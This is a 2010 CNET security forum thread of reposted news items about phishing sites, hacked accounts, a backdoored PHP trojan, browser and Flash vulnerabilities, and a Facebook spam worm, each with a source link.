Spyware, Viruses, & Security forum

General discussion

NEWS - September 06, 2010

by Donna Buenaventura / September 5, 2010 10:07 PM PDT
Every week 57,000 fake Web addresses try to infect users

Every week, hackers are creating 57,000 new Web addresses which they position and index on leading search engines in the hope that unwary users will click them by mistake.

Those who do, will see their computers infected or any data they enter on these pages fall into the hands of criminals. To do this, they use an average of 375 company brands and names of private institutions from all over the world, all of them instantly recognizable.

eBay, Western Union and Visa top the rankings of the most frequently used keywords; followed by Amazon, Bank of America, Paypal and the US revenue service.

These are the conclusions of a study carried out by PandaLabs, which has monitored and analyzed the major blackhat SEO attacks of the last three months.

Some 65% of these fake websites are positioned as belonging to banks. For the most part, they pose as banks in order to steal users? login credentials. Online stores and auction sites are also popular (27%), with eBay the most widely used.

Other financial institutions (such as investment funds or stockbrokers) and government organizations occupy the following positions, with 2.3% and 1.9% respectively. The latter is largely accounted for by the US revenue service or other tax collecting agencies.

Payment platforms, led by Paypal, and ISPs are in fifth and sixth place, while gaming sites ? topped by World of Warcraft- complete the ranking.

http://www.net-security.org/malware_news.php?id=1456
Discussion is locked
You are posting a reply to: NEWS - September 06, 2010
The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our CNET Forums policies for details. All submitted content is subject to our Terms of Use.
Track this discussion and email me when there are updates

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

You are reporting the following post: NEWS - September 06, 2010
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Collapse -
Kirstie Allsopp's Twitter account hacked by iPad spammers
by Donna Buenaventura / September 5, 2010 10:10 PM PDT

Plummy-voiced property crumpet Kirstie Allsopp has fallen foul of hackers on Twitter, who posted messages pointing to free iPad scams this weekend from her account.

The British TV presenter, best known for her Channel 4 property programmes "Location, Location, Location" and "Kirstie's Homemade Home", only found out that her account had been hacked when some of her 47,000 Twitter followers alerted her to the out-of-character tweets.

The links took unsuspecting fans to webpages which encouraged them to apply for free iPads by handing over personal information and signing up for scams that charged

Collapse -
Google pays $8.5m to settle Buzz privacy invasion suit
by Donna Buenaventura / September 5, 2010 10:12 PM PDT

The price of a Tweetbookish Gmail mod

Google has agreed to pay $8.5 million to settle a class action lawsuit claiming it violated the privacy of Gmail users when it released Google Buzz, a Gmail bolt-on that turned the email service into a Tweetbookish social networking tool.

The suit in question consolidates several civil cases filed against the company over Google Buzz, which was rolled out to all Gmail users in February ? before it had been publicly tested. By default, Buzz automatically exposed users' most frequent Gmail contacts to the public internet. You did have the option of hiding the list from the public view, but many complained that the checkbox that let you do so was less than prominently displayed.

Within days, Google agreed to move the checkbox to a more prominent position, and it rejiggered the way it handles user contacts. But this didn't prevent a spate of lawsuits.

http://www.theregister.co.uk/2010/09/05/google_buzz_suit_settlement/

Collapse -
PHP Backdoor Has Another Backdoor Inside
by Donna Buenaventura / September 5, 2010 10:39 PM PDT

Is there no honor among thieves anymore?

The other day I was looking at a remote access Trojan written in the PHP scripting language. The bot loads into memory on a victim?s computer when an unsuspecting user, for example, stumbles upon an iframe pointing to the PHP script embedded in a Web page. The code is nicely appointed with such desirable features as the ability to execute shell commands on the host server, send a flood of data packets at another computer, and scan remote computers.

Once loaded into a victim?s browser, the bot connects to, and is capable of executing commands issued by, a botnet server?until the victim reboots their computer. But for most users, that?s probably long enough. If an attacker can execute commands on an infected user?s computer, installing more Trojans is just child?s play.

But someone appears to have embedded a surprise into this PHP backdoor: It?s another backdoor within the backdoor.

I?m not even going to try to understand why whoever is distributing the bot?s source code chose to name the Web domain where they?d store a Trojan getemgirlfriday.com. Perhaps a closet Howard Hawks or Rosalind Russell fan camps out among the malcode community. Wonderful, in a loathsome sort of way. All I know is, someone?s bugged this bug with another bug. [...]

Once decoded, the meaning of $dc_source becomes clear. The bot writes out the decoded commands into a Perl script then executes them. The commands instruct the bot to connect elsewhere. Were I the criminally minded type to use such a bot, I?m not sure I?d be particularly happy to discover the ?Data Cha0s Connect Back Backdoor? on my server. I suppose that?s why the page hosting the code offers the following overblown expression of gratitude from the group distributing the code

http://blog.webroot.com/2010/09/06/php-backdoor-has-another-backdoor-inside/

Collapse -
VISA Blocks ePassporte
by Donna Buenaventura / September 5, 2010 10:42 PM PDT

Credit card giant VISA International has suspended its business with ePassporte, an Internet payment system widely commonly used to pay adult Webmasters and a raft of other affiliate programs.

Company owner Christopher Mallick broke the news to ePassporte customers in an e-mail sent Thursday, saying Visa International had suspended the company?s ePassporte Visa program, which is processed through St. Kitts Nevis Anguilla National Bank. [...]

ePassporte?s Visa Virtual Account allowed customers to pay online at any Website that accepted Visa cards. The program also issued customers physical cards that could be used to withdraw cash at ATMs around the globe.

I reached out to both Mallick and Visa for further details and will update this blog if I hear from either.

This news caught my attention because I have recently encountered ePassporte accounts tied to several shady affiliate programs, such as those used to reward people who promote rogue anti-virus products and online pharmacy sites.

A number of adult Webmaster forums are buzzing with the news, but few seem to know more than what?s in the statement from ePassporte. However, the administrator of the online forum italkcash.com suggests that the move by Visa is in response to new anti-money laundering requirements mandated by the Credit Card Act of 2009, which affects prepaid cards and other payment card instruments that can be reloaded with funds at places other than financial institutions.

http://krebsonsecurity.com/2010/09/visa-blocks-epassporte/

Collapse -
Flash Player as a spy system
by Donna Buenaventura / September 6, 2010 2:59 AM PDT

If a forged certificate is accepted when accessing the Flash Player's Settings Manager, which is available exclusively online, attackers can potentially manipulate the player's website privacy settings. This allows a web page to access a computer's web cams and microphones and remotely turn the computer into a covert listening device or surveillance camera.

At the "Meta Rhein Main Chaos Days 111b" (German language link), Fraunhofer SIT employee Alexander Klink presented a scenario in which he used a man-in-the-middle attack (MiTM) to intercept the communication with Adobe's Settings Manager. The Settings Manager itself is a simple Flash applet, and the Adobe pages load it into the browser as an SWF file via HTTPS ? a fixed link to it is encoded into the browser. [...]

While attackers need their potential victims to co-operate and accept a forged certificate in order to hack the SSL connection, an error when accessing one of Adobe's Macromedia pages is unlikely to cause much suspicion. Adobe has been informed about the problem and is considering whether to release a new GUI for the Settings Manager. Klink suggests that a warning be displayed when a user accesses certain APIs of external pages. Another alternative is to set the "AVHardwareDisable = 1" option in the mms.cfg configuration file completely disables Flash Player's access to audio and video hardware. The location of this file is revealed in a tech note by Adobe.

http://www.h-online.com/security/news/item/Flash-Player-as-a-spy-system-1073161.html

Collapse -
Data theft in IE via two-year old vulnerability
by Donna Buenaventura / September 6, 2010 3:03 AM PDT
Data theft in Internet Explorer via two-year old vulnerability

A long known vulnerability in Internet Explorer 8 allows attackers to bypass the same origin policy by loading cascading style sheets (CSS) which enables them to gain access to victims' personal data. Google Information Security Engineer Chris Evans has demonstrated the vulnerability by means of an exploit aimed at Twitter, but which can also be applied to other websites. If a user visiting the specially crafted webpage is logged into the micro-blogging service, the page extracts the user's authentication token from a Twitter page and is able to post unlimited messages in the user's account.

The vulnerability was first disclosed around two years ago and was reported to affect all major browsers. The report, in Japanese, appears, however, to have gone unnoticed. It was a further year before other browser vendors reacted and one by one fixed the problem ? after Evans drew attention to the hazard on his blog. With Mozilla finally reacting to the issue in July with Firefox 3.6.7, Internet Explorer is now the only browser the latest version of which (as well as older versions) remains vulnerable. Since the attack does not require JavaScript, there is no way at present for Internet Explorer users to protect themselves ? apart from using a different, non-vulnerable browser.

http://www.h-online.com/security/news/item/Data-theft-in-Internet-Explorer-via-two-year-old-vulnerability-1073488.html
Collapse -
TechCrunch Europe hacked
by Donna Buenaventura / September 6, 2010 11:02 AM PDT

The eagle-eyed harmony guy spotted about an hour ago that some malicious code had been added to the WordPress installation over at TechCrunch Europe.

The code redirects to a host which is serving up malicious PDF files. The PDFs are designed to exploit a vulnerability which leads to the download of that Poison Ivy of the criminal underworld, ZeuS.

The malicious server is hosted by Netdirect over in Frankfurt Germany, a provider with a relatively colourful history of their own.

The file itself has very low detection rates at present and only serves to underline the need for a security solution that considers the threat as a whole instead of focusing on one aspect of the threat.

http://countermeasures.trendmicro.eu/techcrunch-europe-hacked/

Collapse -
Symantec finally secures HackIsWack
by Donna Buenaventura / September 6, 2010 11:07 AM PDT

Symantec has belatedly secured its laughable HackIsWack competition website.

The site - a collaboration between the security software firm and rapper Snoop Dogg - is designed to raise awareness about malware and identity theft by providing a forum for a user-generated cybercrime-themed rap competition. The site had a slow start, and currently boasts an underwhelming 22 videos.

Reg commentards have described the campaign as the most comically inept since the Don't Copy that Floppy anti-piracy screed of the 1990s, an earlier rap music meets security multi-purpose fail.

Even more embarrassingly the security giant went live with a branded site that was riddled with security holes, including a cross-site scripting flaw that amusingly lent itself to a rickrolling attack. In a statement issued over the weekend, Symantec acknowledged the problems, which it said were now resolved.

Symantec was made aware of reported vulnerabilities to the Norton Hack is Wack microsite, and we quickly took the necessary steps to enhance security on the site. We have found no evidence to date that any intrusion into the site or other areas of Symantec?s network or website have occurred.

To date, Symantec can confirm that no company or customer data has been compromised or exposed. Symantec takes the security of our website and microsites very seriously, and we have taken the necessary steps to resolve this issue.


http://www.theregister.co.uk/2010/09/06/hackiswack_secure/

Collapse -
New Spam Worm on Facebook
by Donna Buenaventura / September 6, 2010 11:12 AM PDT

A clever spammer has discovered a Facebook vulnerability that allows for auto-replicating links. Until now, typical Facebook spam has required the use of some social engineering to spread.

But clicking on any of these application spam links is enough to "share" the application to the user's Wall.

Note that each of search results were posted "via Mobile Web", which suggests that a common bug is being exploited. Or perhaps the spammer is posting via m.facebook as it's generally more responsive than the main site.

It's also interesting that the application links seem almost polymorphic or Captcha-like.

All of the links that we tested resulted in a page not found, so Facebook appears to have halted the worm's progress.

http://www.f-secure.com/weblog/archives/00002024.html

Popular Forums
icon
Computer Help 51,912 discussions
icon
Computer Newbies 10,498 discussions
icon
Laptops 20,411 discussions
icon
Security 30,882 discussions
icon
TVs & Home Theaters 21,253 discussions
icon
Windows 10 1,672 discussions
icon
Phones 16,494 discussions
icon
Windows 7 7,855 discussions
icon
Networking & Wireless 15,504 discussions

REVIEW

Meet the drop-resistant Moto Z2 Force

The Moto Z2 Force is really thin, with a fast processor and great battery life. It can survive drops without shattering.